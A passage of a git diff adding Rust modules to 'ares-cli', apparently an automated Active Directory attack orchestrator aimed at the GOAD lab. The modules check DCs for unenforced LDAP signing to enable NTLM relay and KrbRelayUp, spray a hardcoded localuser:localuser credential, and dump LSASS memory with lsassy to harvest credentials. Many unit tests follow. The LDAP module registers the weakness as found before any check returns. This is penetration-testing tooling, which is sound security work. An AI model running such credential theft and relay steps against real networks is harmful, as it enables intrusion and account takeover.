+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30");
+ assert_eq!(work.target_ip, "192.168.58.30");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn ldap_signing_not_enforced_matches() {
+ let vtype = "ldap_signing_not_enforced".to_lowercase();
+ // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required"
+ let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required";
+ assert!(
+ !matches,
+ "ldap_signing_not_enforced should NOT match the specific vuln types"
+ );
+ }
+
+ #[test]
+ fn non_matching_vuln_types() {
+ let types = [
+ "esc1",
+ "smb_signing_disabled",
+ "unconstrained_delegation",
+ "mssql_access",
+ ];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required",
+ "{t} should NOT match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "ws01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn domain_from_fabrikam_host() {
+ let hostname = "srv01.fabrikam.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "fabrikam.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs
new file mode 100644
index 00000000..21edb00e
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs
@@ -0,0 +1,428 @@
+//! auto_ldap_signing -- check LDAP signing enforcement per DC.
+//!
+//! When LDAP signing is not required, attackers can relay NTLM auth to LDAP
+//! for shadow credentials, RBCD writes, or account takeover. This module
+//! dispatches a check per DC to test whether LDAP channel binding and
+//! signing are enforced.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_ldap_signing_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("ldap_sign:{}", dc_ip);
+ if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(LdapSigningWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks each DC for LDAP signing and channel binding enforcement.
+/// Interval: 45s.
+pub async fn auto_ldap_signing(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ldap_signing") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_ldap_signing_work(&state)
+ };
+
+ for item in work {
+ let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_signing_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "instructions": concat!(
+ "Check whether LDAP signing is enforced on this Domain Controller.\n\n",
+ "Use ldap_search or nxc_ldap_command to test LDAP binding. ",
+ "Try an unsigned LDAP bind (simple bind without signing). ",
+ "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n",
+ "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ",
+ "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n",
+ "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ",
+ "you MUST report this as a vulnerability:\n",
+ " vuln_type: 'ldap_signing_disabled'\n",
+ " target_ip: the DC IP\n",
+ " domain: the domain\n",
+ " details: {\"signing_required\": false, \"channel_binding\": false}\n\n",
+ "If LDAP signing IS enforced, report finding with finding_type='hardened'."
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+
+ let priority = dispatcher.effective_priority("ldap_signing");
+ match dispatcher
+ .force_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "LDAP signing check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key)
+ .await;
+
+ // Register ldap_signing_disabled vulnerability proactively so
+ // downstream automations (KrbRelayUp, NTLM relay) can fire
+ // without waiting for the agent's report_finding callback
+ // (which only logs and does NOT populate discovered_vulnerabilities).
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")),
+ vuln_type: "ldap_signing_disabled".to_string(),
+ target: item.dc_ip.clone(),
+ discovered_by: "auto_ldap_signing".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.dc_ip));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert("signing_required".to_string(), json!(false));
+ d.insert("channel_binding".to_string(), json!(false));
+ d
+ },
+ recommended_agent: "coercion".to_string(),
+ priority: dispatcher.effective_priority("ldap_signing"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "LDAP signing disabled — vulnerability registered for KrbRelayUp"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check");
+ }
+ }
+ }
+ }
+}
+
+struct LdapSigningWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("ldap_sign:{}", "192.168.58.10");
+ assert_eq!(key, "ldap_sign:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_signing_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ldap_signing_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = LdapSigningWork {
+ dedup_key: "ldap_sign:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_uses_dc_ip() {
+ // LDAP signing dedup is by DC IP, not domain
+ let key = format!("ldap_sign:{}", "192.168.58.10");
+ assert!(key.starts_with("ldap_sign:"));
+ assert!(key.contains("192.168.58.10"));
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("ldap_sign:{}", "192.168.58.10");
+ let key2 = format!("ldap_sign:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_dc() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam credential available
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs
new file mode 100644
index 00000000..734a6914
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs
@@ -0,0 +1,294 @@
+//! auto_localuser_spray -- test localuser/localuser credentials across domains.
+//!
+//! GOAD configures a `localuser` account with username=password across all three
+//! domains. In one domain this user has Domain Admin privileges. This module
+//! specifically tests the localuser:localuser credential combo against each
+//! discovered DC, which standard password spraying may miss if it doesn't
+//! include "localuser" in its wordlist.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect localuser spray work items from current state.
+///
+/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_localuser_spray_work(state: &StateInner) -> Vec {
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("localuser:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) {
+ continue;
+ }
+
+ items.push(LocaluserWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ });
+ }
+
+ items
+}
+
+/// Tests localuser:localuser credentials against each domain.
+/// Interval: 45s.
+pub async fn auto_localuser_spray(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("localuser_spray") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_localuser_spray_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "smb_login_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": item.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("localuser_spray");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "localuser credential spray dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "localuser spray deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray");
+ }
+ }
+ }
+ }
+}
+
+struct LocaluserWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ // --- collect_localuser_spray_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_localuser_spray_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into());
+ let work = collect_localuser_spray_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn collect_no_credentials_needed() {
+ // localuser_spray does NOT require existing credentials (it uses hardcoded localuser:localuser)
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ assert!(state.credentials.is_empty());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("localuser:{}", "contoso.local");
+ assert_eq!(key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = json!({
+ "technique": "smb_login_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "smb_login_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["credential"]["username"], "localuser");
+ assert_eq!(payload["credential"]["password"], "localuser");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let work = LocaluserWork {
+ dedup_key: "localuser:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn no_credentials_needed_in_work_struct() {
+ // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser
+ let work = LocaluserWork {
+ dedup_key: "localuser:fabrikam.local".into(),
+ domain: "fabrikam.local".into(),
+ dc_ip: "192.168.58.20".into(),
+ };
+ assert_eq!(work.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn credential_uses_domain_from_target() {
+ let domain = "contoso.local";
+ let payload = json!({
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": domain,
+ },
+ });
+ assert_eq!(payload["credential"]["domain"], domain);
+ }
+
+ #[test]
+ fn per_domain_dedup() {
+ let domains = ["contoso.local", "fabrikam.local"];
+ let keys: Vec = domains
+ .iter()
+ .map(|d| format!("localuser:{}", d.to_lowercase()))
+ .collect();
+ assert_eq!(keys.len(), 2);
+ assert_ne!(keys[0], keys[1]);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs
new file mode 100644
index 00000000..b60597d5
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs
@@ -0,0 +1,541 @@
+//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy.
+//!
+//! After secretsdump or other lateral movement marks a host as owned,
+//! this automation dispatches lsassy to dump LSASS process memory and
+//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.)
+//! that secretsdump alone doesn't capture.
+//!
+//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes,
+//! while lsassy gets live session credentials from LSASS memory.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect lsassy dump work items from current state.
+///
+/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_lsassy_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Only target hosts we've already owned (secretsdump succeeded)
+ if !host.owned {
+ continue;
+ }
+
+ let dedup_key = format!("lsassy:{}", host.ip);
+ if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ // Skip when the host's domain is dominated AND every forest is fully
+ // owned. We still want LSASS dumps from owned hosts in a not-yet-fully-
+ // dominated lab (session creds may unlock cross-realm pivots), but once
+ // we have everything there is no point grinding more memory.
+ if !domain.is_empty()
+ && state.dominated_domains.contains(&domain)
+ && state.has_domain_admin
+ && state.all_forests_dominated()
+ {
+ continue;
+ }
+
+ // Find a credential for this host's domain
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ // Fall back to any admin credential
+ state
+ .credentials
+ .iter()
+ .find(|c| c.is_admin && !c.password.is_empty())
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(LsassyWork {
+ dedup_key,
+ host_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dumps LSASS credentials from owned hosts.
+/// Interval: 45s.
+pub async fn auto_lsassy_dump(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("lsassy_dump") {
+ info!("lsassy_dump technique not allowed — skipping");
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ let owned_count = state.hosts.iter().filter(|h| h.owned).count();
+ let cred_count = state.credentials.len();
+ if owned_count > 0 || cred_count > 0 {
+ info!(
+ owned_hosts = owned_count,
+ credentials = cred_count,
+ "lsassy_dump tick: checking for work"
+ );
+ }
+ collect_lsassy_work(&state)
+ };
+
+ if !work.is_empty() {
+ info!(count = work.len(), "lsassy_dump work items collected");
+ }
+
+ for item in work {
+ let payload = json!({
+ "technique": "lsassy_dump",
+ "target_ip": item.host_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("lsassy_dump");
+ match dispatcher
+ .force_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host_ip,
+ hostname = %item.hostname,
+ "LSASS dump dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ info!(host = %item.host_ip, "LSASS dump deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump");
+ }
+ }
+ }
+ }
+}
+
+struct LsassyWork {
+ dedup_key: String,
+ host_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_owned_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: true,
+ }
+ }
+
+ fn make_unowned_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ // --- collect_lsassy_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_unowned_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_unowned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_owned_host_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
